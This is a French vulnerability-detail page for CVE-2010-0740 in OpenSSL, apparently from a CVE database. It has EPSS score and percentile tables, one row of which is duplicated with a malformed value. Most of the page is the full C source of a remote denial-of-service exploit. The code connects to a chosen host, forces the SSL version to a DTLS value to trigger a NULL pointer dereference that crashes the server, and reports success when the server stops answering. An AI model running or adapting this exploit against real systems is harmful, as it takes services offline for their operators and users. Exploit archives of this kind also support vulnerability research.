CVE-2010-0740 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	12.57%	–	–
2022-04-03	–	–	12.57%	–	–
2023-02-26	–	–	12.57%	–	–
2023-03-12	–	–	–	96.39%	–
2023-05-28	–	–	–	96.09%	–
2023-07-16	–	–	–	95.99%	–
2023-08-27	–	–	–	95.89%	–
2023-10-08	–	–	–	95.81%	–
2023-11-19	–	–	–	95.99%	–
2024-02-18	–	–	–	95.59%	–
2024-06-02	–	–	–	95.59%	–
2024-08-25	–	–	–	95.38%	–
2024-11-03	–	–	–	95.2%	–
2024-12-15	–	–	–	95.59%	–
2024-12-22	–	–	–	87%	–
2025-01-19	–	–	–	87%	–
2025-03-18	–	–	–	–	19.64%
2025-03-30	–	–	–	–	21.91%
2025-03-30	–	–	–	–	21.91,%

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Date	Percentile
2022-02-06	9%
2022-04-03	95%
2023-02-26	96%
2023-03-12	99%
2023-05-28	99%
2023-07-16	99%
2023-08-27	99%
2023-10-08	99%
2023-11-19	99%
2024-02-18	99%
2024-06-02	99%
2024-08-25	99%
2024-11-03	99%
2024-12-15	99%
2024-12-22	99%
2025-01-19	99%
2025-03-18	95%
2025-03-30	95%
2025-03-30	95%

/*********************************************************** * hoagie_openssl_record_of_death.c * OPENSSL REMOTE DENIAL-OF-SERVICE EXPLOIT * - OpenSSL 0.9.8m (short = 16 bit) * - OpenSSL 0.9.8f through 0.9.8m (short != 16 bit) * * CVE-2010-0740 * * Bug discovered by: * Bodo Moeller and Adam Langley (Google) * Philip Olausson <po@secweb.se> * http://openssl.org/news/secadv_20100324.txt * * The main problem is in ssl/t1_enc.c => tls1_mac() function * * - OpenSSL 0.9.8m * if (ssl->version == DTLS1_BAD_VER || * (ssl->version == DTLS1_VERSION && ssl->client_version != DTLS1_BAD_VER)) * { * unsigned char dtlsseq[8],*p=dtlsseq; * s2n(send?ssl->d1->w_epoch:ssl->d1->r_epoch, p); * * - OpenSSL 0.9.8f - 0.9.8n * if (ssl->version == DTLS1_VERSION && ssl->client_version != DTLS1_BAD_VER) * { * unsigned char dtlsseq[8],*p=dtlsseq; * * s2n(send?ssl->d1->w_epoch:ssl->d1->r_epoch, p); * * There is a NULL pointer dereference => ssl->d1 because d1 is only initialized in * ssl/d1_lib.c => dtls1_new(). So if you use SSLv23_server_method() or * TLSv1_server_method() this variable will be NULL. * * If the patch (see http://openssl.org/news/secadv_20100324.txt) is not applied * its possible to set the version to DTLS1_BAD_VER (0x100) or DTLS_VERSION (0xfeff) * and transmit the packet to the server or client to trigger the vulnerability. * * When you are using OpenSSL 0.9.8m you can send DTLS1_BAD_VER because 0x100 is not * a problem with signed/unsigned. * * If you are using OpenSSL 0.9.8f to 0.9.8n you have to trigger the vulnerability * via DTLS1_VERSION. In that case version will be 0xfffffeff. So it doesnt work * if DTLS1_VERSION is 16 bit. * * THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF- * CONCEPT. THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY * DAMAGE DONE USING THIS PROGRAM. * * VOID.AT Security * andi@void.at * http://www.void.at * ************************************************************/ #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <string.h> #include <netdb.h> #include <time.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <openssl/ssl.h> /* usage * display help screen */ void usage(int argc, char **argv) { fprintf(stderr, "usage: %s [-h] [-v] [-d <host>] [-p <port>]\n" "\n" "-h help\n" "-v verbose\n" "-d host SSL server\n" "-p port SSL port\n" "-t target\n" " 0 ... OpenSSL 0.9.8m (short = 16 bit) - default\n" " 1 ... OpenSSL 0.9.8f through 0.9.8m (short != 16 bit)\n" , argv[0]); exit(1); } /* connect_to * connect to remote http server */ int connect_to(char *host, int port) { struct sockaddr_in s_in; struct hostent *he; int s; if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) { return -1; } memset(&s_in, 0, sizeof(s_in)); s_in.sin_family = AF_INET; s_in.sin_port = htons(port); if ( (he = gethostbyname(host)) != NULL) memcpy(&s_in.sin_addr, he->h_addr, he->h_length); else { if ( (s_in.sin_addr.s_addr = inet_addr(host) ) < 0) { return -3; } } if (connect(s, (struct sockaddr *)&s_in, sizeof(s_in)) == -1) { return -4; } return s; } /* ssl_connect_to * establish ssl connection over tcp connection */ SSL *ssl_connect_to(int s) { SSL *ssl; SSL_CTX *ctx; BIO *sbio; SSL_METHOD *meth; CRYPTO_malloc_init(); SSL_load_error_strings(); SSL_library_init(); // meth = TLSv1_client_method(); meth = SSLv23_client_method(); ctx = SSL_CTX_new(meth); ssl = SSL_new(ctx); sbio = BIO_new_socket(s, BIO_NOCLOSE); SSL_set_bio(ssl, sbio, sbio); if (SSL_connect(ssl) <= 0) { return NULL; } return ssl; } int main(int argc, char **argv) { struct sockaddr_in s_in; struct hostent *he; char data[1024]; int s; int target = 0; char c; char *destination = NULL; int port = 0; SSL *ssl = NULL; fprintf(stderr, "hoagie_openssl_record_of_death.c - openssl ssl3_get_record() remote\n" "-andi / void.at\n\n"); if (argc < 2) { usage(argc, argv); } else { while ((c = getopt (argc, argv, "hd:p:t:")) != EOF) { switch (c) { case 'h': usage(argc, argv); break; case 'd': destination = optarg; break; case 'p': port = atoi(optarg); break; case 't': target = atoi(optarg); break; } } if (!destination || !port) { fprintf(stderr, "[*] destination and/or port missing\n"); } else if (target && target != 1) { fprintf(stderr, "[*] invalid target '%d'\n", target); } else { s = connect_to(destination, port); if (s > 0) { fprintf(stderr, "[+] tcp connection to '%s:%d' successful\n", destination, port); ssl = ssl_connect_to(s); if (ssl) { fprintf(stderr, "[+] ssl connection to '%s:%d' successful\n", destination, port); snprintf(data, sizeof(data), "GET / HTTP/1.0\r\n\r\n"); fprintf(stderr, "[+] sending first packet ...\n"); SSL_write(ssl, data, strlen(data)); if (!target) { ssl->version = DTLS1_BAD_VER; } else { ssl->version = DTLS1_VERSION; } fprintf(stderr, "[+] sending second paket ...\n"); SSL_write(ssl, data, strlen(data)); SSL_shutdown(ssl); close(s); sleep(1); s = connect_to(destination, port); if (s > 0) { fprintf(stderr, "[-] exploit failed\n"); close(s); } else { fprintf(stderr, "[+] exploit successful\n"); } } else { fprintf(stderr, "[-] ssl connection to '%s:%d' failed\n", destination, port); } } else { fprintf(stderr, "[-] tcp connection to '%s:%d' failed\n", destination, port); } } } return 0; }